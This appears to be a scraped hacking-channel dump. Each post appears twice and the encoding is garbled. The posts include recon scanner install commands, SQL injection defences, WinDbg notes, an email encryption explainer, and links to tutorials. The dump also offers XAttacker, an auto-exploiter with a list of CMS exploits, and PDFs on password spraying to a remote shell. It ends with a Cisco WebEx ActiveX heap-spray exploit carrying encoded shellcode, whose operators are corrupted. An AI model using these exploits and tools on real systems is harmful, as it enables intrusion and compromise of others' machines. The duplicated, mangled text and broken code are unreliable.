β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/j3ssie/Osmedeus
2) cd Osmedeus
3) ./install.sh
4) ./osmedeus.py -t example.com
5) # normal routine
./osmedeus.py -t example.com
./osmedeus.py -T list_of_target.txt
# normal routine but slow speed on all moddule
./osmedeus.py -t example.com --slow 'all'
# normal routine but exclude some modules
./osmedeus.py -t example.com -x 'linkfinding,dirb'
# direct mode examples
./osmedeus.py -m subdomain -t example.com
./osmedeus.py -m portscan -i "1.2.3.4/24"
./osmedeus.py -m "portscan,vulnscan" -i "1.2.3.4/24" -w result_folder
# direct list mode examples
./osmedeus.py -m portscan -I list_of_targets.txt
./osmedeus.py -m portscan,vulnscan -I list_of_targets.txt
./osmedeus.py -m screen -I list_of_targets.txt -w result_folder
# report mode
./osmedeus.py -t example.com --report list
./osmedeus.py -t example.com --report export
./osmedeus.py -t example.com --report sum
./osmedeus.py -t example.com --report short
./osmedeus.py -t example.com --report full
π¦F E A T U R E S :
Subdomain Scan.
Subdomain TakeOver Scan.
Screenshot the target.
Basic recon like Whois, Dig info.
Web Technology detection.
IP Discovery.
CORS Scan.
SSL Scan.
Wayback Machine Discovery.
URL Discovery.
Headers Scan.
Port Scan.
Vulnerable Scan.
Seperate workspaces to store all scan output and details logging.
REST API.
Slack notific React Web UI.
Support Continuous Scan.
ations.
Easily view report from commnad line.
enjoyβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/j3ssie/Osmedeus
2) cd Osmedeus
3) ./install.sh
4) ./osmedeus.py -t example.com
5) # normal routine
./osmedeus.py -t example.com
./osmedeus.py -T list_of_target.txt
# normal routine but slow speed on all moddule
./osmedeus.py -t example.com --slow 'all'
# normal routine but exclude some modules
./osmedeus.py -t example.com -x 'linkfinding,dirb'
# direct mode examples
./osmedeus.py -m subdomain -t example.com
./osmedeus.py -m portscan -i "1.2.3.4/24"
./osmedeus.py -m "portscan,vulnscan" -i "1.2.3.4/24" -w result_folder
# direct list mode examples
./osmedeus.py -m portscan -I list_of_targets.txt
./osmedeus.py -m portscan,vulnscan -I list_of_targets.txt
./osmedeus.py -m screen -I list_of_targets.txt -w result_folder
# report mode
./osmedeus.py -t example.com --report list
./osmedeus.py -t example.com --report export
./osmedeus.py -t example.com --report sum
./osmedeus.py -t example.com --report short
./osmedeus.py -t example.com --report full
π¦F E A T U R E S :
Subdomain Scan.
Subdomain TakeOver Scan.
Screenshot the target.
Basic recon like Whois, Dig info.
Web Technology detection.
IP Discovery.
CORS Scan.
SSL Scan.
Wayback Machine Discovery.
URL Discovery.
Headers Scan.
Port Scan.
Vulnerable Scan.
Seperate workspaces to store all scan output and details logging.
REST API.
Slack notific React Web UI.
Support Continuous Scan.
ations.
Easily view report from commnad line.
enjoyβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - j3ssie/osmedeus: A Workflow Engine for Offensive Security
A Workflow Engine for Offensive Security. Contribute to j3ssie/osmedeus development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SQL injection vulnerability solutions:
1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration
2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.
3. The special characters ('"\<>&*; etc.) entering the database are escaped or coded.
4. Confirm the type of each data. For example, numeric data must be numeric, and the storage field in the database must correspond to int type.
5. The length of the data should be strictly regulated to prevent the relatively long SQL injection statement from being executed correctly to a certain extent.
6. The coding of each data layer of the website is unified. It is recommended to use UTF-8 coding. Inconsistent upper and lower coding may cause some filtering models to be bypassed.
7. Strictly restrict the operation authority of the website user's database, and provide this user with only the authority that can satisfy his work, thereby minimizing the harm of the injection attack to the database.
8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time.
ENJOY β€οΈππ»
WRITTEN BY
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SQL injection vulnerability solutions:
1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration
2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.
3. The special characters ('"\<>&*; etc.) entering the database are escaped or coded.
4. Confirm the type of each data. For example, numeric data must be numeric, and the storage field in the database must correspond to int type.
5. The length of the data should be strictly regulated to prevent the relatively long SQL injection statement from being executed correctly to a certain extent.
6. The coding of each data layer of the website is unified. It is recommended to use UTF-8 coding. Inconsistent upper and lower coding may cause some filtering models to be bypassed.
7. Strictly restrict the operation authority of the website user's database, and provide this user with only the authority that can satisfy his work, thereby minimizing the harm of the injection attack to the database.
8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time.
ENJOY β€οΈππ»
WRITTEN BY
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
WinDbg Malware Analysis Cheat Sheet.pdf
2 MB
1) !address List all memory segments in the process with their permissions and memory type. This is similar to the Memory Map in x64dbg.
2) !address [virtual address] List information about the memory segment that contains the virtual address. For example !address 400000 would show information about the section that contains address 0x40000. This is a quick way to find the start and end of a memory segment if you want to dump it.
.writemem [file name] [start address] [end address] Dump memory range to file. For example, .writemem C:
3) \dump.bin 400000 401000 would dump memory starting at 0x40000 and ending at 0x401000 to the dump.bin file.
eb [address] [byte] Enter one byte into memory at the address. For example, eb 400000 0xff would change the byte at address 0x400000 to 0xff. For a full list of enter commands (string, word, etc.) see the Microsoft docs here.
#full with video
2) !address [virtual address] List information about the memory segment that contains the virtual address. For example !address 400000 would show information about the section that contains address 0x40000. This is a quick way to find the start and end of a memory segment if you want to dump it.
.writemem [file name] [start address] [end address] Dump memory range to file. For example, .writemem C:
3) \dump.bin 400000 401000 would dump memory starting at 0x40000 and ending at 0x401000 to the dump.bin file.
eb [address] [byte] Enter one byte into memory at the address. For example, eb 400000 0xff would change the byte at address 0x400000 to 0xff. For a full list of enter commands (string, word, etc.) see the Microsoft docs here.
#full with video
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Attacker Tool, Website Vulnerability Scanner & Auto Exploiter
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
on termux install :
1) git clone https://github.com/Moham3dRiahi/XAttacker.git
2) cd XAttacker
3) chmod +x termux-install.sh
4) bash termux-install.sh
π¦Installation Windows alt tag
1) Download Perl
2) Download XAttacker
3) Extract XAttacker into Desktop
4) Open CMD and type the following commands:
5) cd Desktop/XAttacker-master/
6) perl XAttacker.pl
π¦SOME FEATURES :
blocktestimonial Exploit
β’ Rightnow Theme Exploit
β’ Konzept Exploit
β’ Omni Secure Files Exploit
β’ Pitchprint Exploit
β’ Satoshi Exploit
β’ Pinboard Exploit
β’ Barclaycart Exploit
β’ Com Facileforms Exploit
β’ Com Jwallpapers Exploit
β’ Com Extplorer Exploit
β’ Com Rokdownloads Exploit
β’ Com Sexycontactform Exploit
β’ Com Jbcatalog Exploit
β’ Com Blog Exploit
β’ Com Foxcontact Exploit
β’ Drupal Geddon Exploit
@UndercodeTesting
β verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Attacker Tool, Website Vulnerability Scanner & Auto Exploiter
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
on termux install :
1) git clone https://github.com/Moham3dRiahi/XAttacker.git
2) cd XAttacker
3) chmod +x termux-install.sh
4) bash termux-install.sh
π¦Installation Windows alt tag
1) Download Perl
2) Download XAttacker
3) Extract XAttacker into Desktop
4) Open CMD and type the following commands:
5) cd Desktop/XAttacker-master/
6) perl XAttacker.pl
π¦SOME FEATURES :
blocktestimonial Exploit
β’ Rightnow Theme Exploit
β’ Konzept Exploit
β’ Omni Secure Files Exploit
β’ Pitchprint Exploit
β’ Satoshi Exploit
β’ Pinboard Exploit
β’ Barclaycart Exploit
β’ Com Facileforms Exploit
β’ Com Jwallpapers Exploit
β’ Com Extplorer Exploit
β’ Com Rokdownloads Exploit
β’ Com Sexycontactform Exploit
β’ Com Jbcatalog Exploit
β’ Com Blog Exploit
β’ Com Foxcontact Exploit
β’ Drupal Geddon Exploit
@UndercodeTesting
β verified
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub is where people build software. More than 150 million people use GitHub to discover, fork, and contribute to over 420 million projects.
From unauthenticated to root on a supervision appliance.pdf
469.9 KB
EyesOfNetwork (βEONβ) is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. EyesOfNetwork Supervision provides event management, availability, problems and capacity
#full tutorial + pictures
#full tutorial + pictures
Password Spraying Outlook Web Access_ Remote Shell.pdf
617.7 KB
#requested full with pictures
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦3 ways to encrypt emails
> There are currently three common mail encryption methods:
1οΈβ£The first type: use symmetric encryption algorithm to encrypt mail
Symmetric encryption algorithm is an earlier encryption algorithm with mature technology. In the symmetric encryption algorithm, the data sender processes the plaintext (original data) and the encryption key together with a special encryption algorithm to make it a complex encrypted ciphertext and send it out. After receiving the ciphertext, if the recipient wants to interpret the original text, it needs to decrypt the ciphertext using the used encryption key and the inverse algorithm of the same algorithm to restore it to a readable plaintext.
2οΈβ£The second type: use PKI/CA certification to encrypt encrypted mail
Most of the current email encryption systems are based on this encryption method. PKI (Public Key Infrastructure) refers to the public key infrastructure, and CA (Certificate Authority) refers to the certification center.Therefore, people collectively referred to as "PKI/CA".. The registration center is responsible for reviewing the true identity of the certificate applicant. After the review is passed, it is responsible for uploading user information to the certification center through the network, and the certification center is responsible for the final certification processing. The revocation and renewal of the certificate also needs to be submitted by the registration agency to the certification center for processing. In general, the certification center is oriented to each registration center, and the registration center is oriented to the end user, and the registration agency is the intermediate channel between the user and the certification center. The management of public key certificates is a complex system. his encryption method is only suitable for enterprises, organizations and some high-end users. Because of the trouble to obtain CA certificates and cumbersome exchanges, this type of email encryption mode has been difficult to popularize.
3οΈβ£The third type: the use of identity-based password technology for email encryption
In order to simplify the key management problem of the traditional public key cryptosystem, in 1984, A. Shamir, an Israeli scientist and one of the inventors of the well-known RSA system, proposed the idea of ββidentity-based cryptography: the userβs public identity information (such as e-mail addresses) , IP address, name..., etc.) as the user's public key, and the user's private key is generated by a trusted center called the private key generator. In the following two decades, the design of identity-based cryptosystems has become a hot research field in cryptography
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦3 ways to encrypt emails
> There are currently three common mail encryption methods:
1οΈβ£The first type: use symmetric encryption algorithm to encrypt mail
Symmetric encryption algorithm is an earlier encryption algorithm with mature technology. In the symmetric encryption algorithm, the data sender processes the plaintext (original data) and the encryption key together with a special encryption algorithm to make it a complex encrypted ciphertext and send it out. After receiving the ciphertext, if the recipient wants to interpret the original text, it needs to decrypt the ciphertext using the used encryption key and the inverse algorithm of the same algorithm to restore it to a readable plaintext.
2οΈβ£The second type: use PKI/CA certification to encrypt encrypted mail
Most of the current email encryption systems are based on this encryption method. PKI (Public Key Infrastructure) refers to the public key infrastructure, and CA (Certificate Authority) refers to the certification center.Therefore, people collectively referred to as "PKI/CA".. The registration center is responsible for reviewing the true identity of the certificate applicant. After the review is passed, it is responsible for uploading user information to the certification center through the network, and the certification center is responsible for the final certification processing. The revocation and renewal of the certificate also needs to be submitted by the registration agency to the certification center for processing. In general, the certification center is oriented to each registration center, and the registration center is oriented to the end user, and the registration agency is the intermediate channel between the user and the certification center. The management of public key certificates is a complex system. his encryption method is only suitable for enterprises, organizations and some high-end users. Because of the trouble to obtain CA certificates and cumbersome exchanges, this type of email encryption mode has been difficult to popularize.
3οΈβ£The third type: the use of identity-based password technology for email encryption
In order to simplify the key management problem of the traditional public key cryptosystem, in 1984, A. Shamir, an Israeli scientist and one of the inventors of the well-known RSA system, proposed the idea of ββidentity-based cryptography: the userβs public identity information (such as e-mail addresses) , IP address, name..., etc.) as the user's public key, and the user's private key is generated by a trusted center called the private key generator. In the following two decades, the design of identity-based cryptosystems has become a hot research field in cryptography
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME GOOD HACKING RESOURCES
1. Setup lab with bWAPP β https://www.youtube.com/watch? v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
2. Set up Burp Suite β https://www.youtube.com/watch? v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2
3. Congure Firefox and add certicate β https://www.youtube.com/watch? v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
4. Mapping and scoping website β https://www.youtube.com/watch?v=H_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
5. Spidering β https://www.youtube.com/watch? v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
6. Active and passive scanning β https://www.youtube.com/watch? v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
7. Scanner options and demo β https://www.youtube.com/watch?v=gANi4Kt7ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
8. Introduction to password security β https://www.youtube.com/watch? v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8
9. Intruder β https://www.youtube.com/watch? v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9
10. Intruder attack types β https://www.youtube.com/watch? v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
11. Payload settings β https://www.youtube.com/watch?v=5GpdlbtL1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME GOOD HACKING RESOURCES
1. Setup lab with bWAPP β https://www.youtube.com/watch? v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
2. Set up Burp Suite β https://www.youtube.com/watch? v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2
3. Congure Firefox and add certicate β https://www.youtube.com/watch? v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
4. Mapping and scoping website β https://www.youtube.com/watch?v=H_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
5. Spidering β https://www.youtube.com/watch? v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
6. Active and passive scanning β https://www.youtube.com/watch? v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
7. Scanner options and demo β https://www.youtube.com/watch?v=gANi4Kt7ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
8. Introduction to password security β https://www.youtube.com/watch? v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8
9. Intruder β https://www.youtube.com/watch? v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9
10. Intruder attack types β https://www.youtube.com/watch? v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
11. Payload settings β https://www.youtube.com/watch?v=5GpdlbtL1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit code 2020 :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit code 2020 :
<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β